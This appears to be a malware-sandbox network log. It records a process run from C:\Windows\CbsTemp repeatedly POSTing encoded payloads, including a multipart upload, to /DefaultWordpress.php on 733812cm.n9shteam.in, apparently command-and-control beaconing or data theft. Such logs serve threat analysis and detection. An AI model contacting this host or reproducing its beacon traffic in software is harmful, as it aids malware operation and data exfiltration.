                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8NLwCorUAinjxlpuY35P0%2FEAxnU9Czmw64S6kiF1AXZr8G01x%2Bg0MhG96CuPy9%2By2E2H6UhEirFdXJ4AeGVomWLDZW9rgYo3%2Bw82pwuATYSGQffP4PUZKP41q9qy4tIP9B6XWWgnhg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a52a0eff4cf4d-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11741&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2827&delivery_rate=116025&cwnd=54&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0
                                                          Oct 20, 2024 18:18:16.537457943 CEST789INHTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:16 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8NLwCorUAinjxlpuY35P0%2FEAxnU9Czmw64S6kiF1AXZr8G01x%2Bg0MhG96CuPy9%2By2E2H6UhEirFdXJ4AeGVomWLDZW9rgYo3%2Bw82pwuATYSGQffP4PUZKP41q9qy4tIP9B6XWWgnhg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a52a0eff4cf4d-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11741&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2827&delivery_rate=116025&cwnd=54&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          17192.168.2.549866188.114.96.380892C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 20, 2024 18:18:16.644735098 CEST311OUTPOST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 20, 2024 18:18:17.004992962 CEST2528OUTData Raw: 5b 5b 5c 52 5f 5a 54 51 54 5b 52 57 50 5e 57 52 50 5f 5d 56 50 54 57 55 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: [[\R_ZTQT[RWP^WRP_]VPTWU\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\ )3&%8=R+''+.?.)< Z3=[&2+3&3+*#F $P.4
                                                          Oct 20, 2024 18:18:17.459938049 CEST25INHTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:17.830497026 CEST793INHTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:17 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qlSS%2F5Ztg%2BbIpPPdKqJXfHKDzTfIdLzi%2B4YBslWxeO743FZGTMIq08Rt7uT1shmNs416R%2FhAGHnzkUbzVJj5dkoBnqE2TwEEFEvkLzRnQliJhR6dry238MyvUwpOwJNk3yQowX2%2F%2BA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a52aa999dfa52-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11181&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2839&delivery_rate=129251&cwnd=87&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          18192.168.2.549869188.114.96.380892C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 20, 2024 18:18:17.141603947 CEST311OUTPOST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 1948
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 20, 2024 18:18:17.495001078 CEST1948OUTData Raw: 5b 5e 59 5c 5a 5b 54 51 54 5b 52 57 50 53 57 50 50 58 5d 5e 50 54 57 55 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: [^Y\Z[TQT[RWPSWPPX]^PTWU\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\#(#9X$+<80(=<=,8Y08200-$:]<*#F $P.
                                                          Oct 20, 2024 18:18:19.197911978 CEST25INHTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:19.430666924 CEST943INHTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:19 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Jc4Jc%2BBO1iCqirt2yIA1hXjS2esyyhniPSia7vgetUU6OsBuqjpV1F4iBK6jS%2BwP%2FX0Tgz%2B6c8PW1DVNARN6zfjNtAHe1wmspWCVbuwJIn82o%2BgF%2BwypCiTgK4Kl0LVL9CYhyL4kgg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a52b5780196b1-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=13081&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2259&delivery_rate=102014&cwnd=165&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 39 38 0d 0a 0d 10 25 03 30 06 30 09 29 3f 3b 0a 2e 07 2a 0d 2e 03 02 03 3a 1f 36 05 24 33 2d 01 27 3a 03 11 31 0d 2b 58 23 3c 31 02 20 59 3d 1d 3a 1c 28 5e 07 12 26 13 3f 12 3c 16 3e 3d 06 14 28 06 01 00 22 0e 2f 06 27 3e 2f 56 33 03 36 01 2a 0f 31 10 3e 03 03 09 39 1a 0b 0a 2d 2b 23 00 37 00 22 53 03 13 25 58 3d 09 20 59 36 22 23 13 2b 13 37 5b 2b 38 3a 5a 2a 23 27 1f 2b 28 09 1d 2c 5b 32 59 30 3f 3f 03 26 3f 2f 00 32 2a 23 19 24 2a 24 5e 2d 0e 2f 57 04 36 5b 4f 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 98%00)?;.*.:6$3-':1+X#<1 Y=:(^&?<>=("/'>/V36*1>9-+#7"S%X= Y6"#+7[+8:Z*#'+(,[2Y0??&?/2*#$*$^-/W6[O0
                                                          Oct 20, 2024 18:18:19.439564943 CEST286OUTPOST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 532
                                                          Expect: 100-continue
                                                          Oct 20, 2024 18:18:19.791896105 CEST532OUTData Raw: 5e 5a 5c 5e 5f 58 54 57 54 5b 52 57 50 5a 57 55 50 58 5d 5f 50 56 57 5d 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: ^Z\^_XTWT[RWPZWUPX]_PVW]\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\#=1X2]%?$^-<*,<\0/1! %;&X$-*_+:#F $P.
                                                          Oct 20, 2024 18:18:20.453161001 CEST25INHTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:20.675885916 CEST791INHTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:20 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GPJ%2FIYhUmg78%2FV0KQDZaml5v3ago7WaUAIoOPW5502UuCclp2yjAITJoAEY1CL38NtPvh7VCWNrC6NH52RFCa4B43OnYQ1wwKpxYN52Bf1cKq%2Fh2WuXktGkskag%2FrgXox1FSTJbmfw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a52bd4e1596b1-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=13022&sent=5&recv=9&lost=0&retrans=0&sent_bytes=993&recv_bytes=3077&delivery_rate=224165&cwnd=168&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0
                                                          Oct 20, 2024 18:18:20.676363945 CEST322OUTPOST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: multipart/form-data; boundary=----OBAJkATLExqqd3jrm1ca4QICBXNQGpX11R
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 3006
                                                          Expect: 100-continue
                                                          Oct 20, 2024 18:18:20.855206013 CEST25INHTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:20.855400085 CEST3006OUTData Raw: 2d 2d 2d 2d 2d 2d 4f 42 41 4a 6b 41 54 4c 45 78 71 71 64 33 6a 72 6d 31 63 61 34 51 49 43 42 58 4e 51 47 70 58 31 31 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 30 22
                                                          Data Ascii: ------OBAJkATLExqqd3jrm1ca4QICBXNQGpX11RContent-Disposition: form-data; name="0"Content-Type: text/plain[_\RZYQQT[RWPZW\P_]WPRWZ\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^
                                                          Oct 20, 2024 18:18:21.469187021 CEST794INHTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:21 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WF81D9dR9mpCbNVTSYDsGWBRHPaUdvKw%2BahoCVw0njCAUywgkMIxVEhWpPM4%2FKxFYDSif3GKWW6DSM7gfYYOxMibjJNMdMk%2Bc0IVKyvSu2zkh5AR3%2BEpEKML7sLWyq2XQB9GzfGw0g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a52bfc8d096b1-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=13152&sent=10&recv=17&lost=0&retrans=0&sent_bytes=1809&recv_bytes=6405&delivery_rate=224165&cwnd=171&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          19192.168.2.549874188.114.96.380892C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 20, 2024 18:18:17.959599018 CEST311OUTPOST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 20, 2024 18:18:18.308712959 CEST2528OUTData Raw: 5e 5d 5c 53 5f 5f 54 55 54 5b 52 57 50 59 57 5d 50 5d 5d 5c 50 50 57 58 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: ^]\S__TUT[RWPYW]P]]\PPWX\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\#)0-%T>3;'^%T=-([*/,\'>3X2Z$(1'.)+*#F $P.(
                                                          Oct 20, 2024 18:18:18.736522913 CEST25INHTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:19.101535082 CEST791INHTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:19 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=r8L3AMhSXyFhiW0%2FjKAFEZvVekql5DpPddiF%2FGLXb8U6JbzOKtM3l5tx7AlvJlYdVBVCkCtEQ%2FG0o%2BwXhTHvDBWm1mojdXxwAGkWMSXjGh69Gc57jJfcXuNuno%2FQDsvpT9Cslg4Trw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a52b29c7ccf82-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11280&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2839&delivery_rate=129204&cwnd=57&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          20192.168.2.549880188.114.96.380892C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 20, 2024 18:18:19.234040022 CEST287OUTPOST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Oct 20, 2024 18:18:19.588831902 CEST2528OUTData Raw: 5b 59 5c 5c 5f 5d 54 52 54 5b 52 57 50 53 57 51 50 51 5d 5e 50 53 57 5f 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: [Y\\_]TRT[RWPSWQPQ]^PSW_\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\ )3^2<3'Z&8!(-;(/$$=?1"7$(&]'+:#F $P.
                                                          Oct 20, 2024 18:18:20.037831068 CEST25INHTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:20.303100109 CEST791INHTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:20 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WRUt0fAAmYQhXcftWC5BVc%2BWIgZxeLU3H0PZTuO215nw5yiu5utnQu2TjZmDZHoeE2iv06DXoDDjGmzeuYDGCNIjYVg1wZKdtRBL%2B11ErDuyWt2VoUI7%2Ft0F%2FFKWOfwYb2bS%2BpCnLw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a52babe94faaa-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11267&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2815&delivery_rate=128940&cwnd=56&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          21192.168.2.549886188.114.96.380892C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 20, 2024 18:18:20.488634109 CEST287OUTPOST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Oct 20, 2024 18:18:20.838932037 CEST2528OUTData Raw: 5e 58 59 58 5a 53 54 52 54 5b 52 57 50 52 57 5d 50 5d 5d 57 50 52 57 54 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: ^XYXZSTRT[RWPRW]P]]WPRWT\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\ Y( !Z1!? $$8==8\)40'$"+Z';2]3=9?:#F $P.
                                                          Oct 20, 2024 18:18:21.265302896 CEST25INHTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:21.635499001 CEST788INHTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:21 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PwzEXHTTqzrjoitJ8D46A6xUO25sy9c2sgnptuuW6eEddqCFxmw6MDqxqeMnL3l9DhyxB2D8g4MS0m6s%2F3hGCi1OaRsPpS8ZIG%2F74gz59sKxEDBGLA%2F8vfpHqHkuVylkzNIBxU9apg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a52c25bc71748-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=12109&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2815&delivery_rate=121568&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          22192.168.2.549891188.114.96.380892C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 20, 2024 18:18:21.870031118 CEST287OUTPOST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Oct 20, 2024 18:18:22.230448008 CEST2528OUTData Raw: 5b 5b 5c 5e 5f 5a 51 50 54 5b 52 57 50 5e 57 57 50 59 5d 5b 50 51 57 5c 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: [[\^_ZQPT[RWP^WWPY][PQW\\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\ * .%+*<3'1U(>=/$3=/X$14$(>]0>.\(#F $P.4
                                                          Oct 20, 2024 18:18:22.689568043 CEST25INHTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:23.059432983 CEST793INHTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:22 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rs4dZlw%2B7iKyou4%2BYN3FPmZrF18LyLSjQleb3waphMzCZ4akQUsFXHYla%2Bct%2B4Mklrwg5SF059AG6HqFX%2BZajaj4WtPOeeFJ8yOHAwasJ4L3kPDU%2BrtsQHtpDnER42kkrIsjgkwQGw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a52cb4e3467eb-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11255&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2815&delivery_rate=119817&cwnd=31&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          23192.168.2.549897188.114.96.380892C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 20, 2024 18:18:23.186777115 CEST311OUTPOST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 20, 2024 18:18:23.541804075 CEST2528OUTData Raw: 5e 5c 5c 53 5a 5d 51 5d 54 5b 52 57 50 59 57 50 50 58 5d 5c 50 50 57 5e 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: ^\\SZ]Q]T[RWPYWPPX]\PPW^\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\#(#:%=+#;3()(=?8\&-+_%143.Y'"\?#F $P.(
                                                          Oct 20, 2024 18:18:24.479649067 CEST25INHTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:24.843765974 CEST794INHTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:24 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2mz8fiuYkh0MmmczYJUAmAsm1BddA%2F4SdVtkJLH0R0%2FD%2BZbMc1xvUqNb%2B6UZFJGl8%2BhVRndVb1QNeGGC5LMhmrdD%2FEAdR2C8Sdx54ibTMrPrtbJtmkThLjhNTjeFaJh3ufSGJouSrw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a52d67d4915ba-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11598&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2839&delivery_rate=124655&cwnd=201&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0


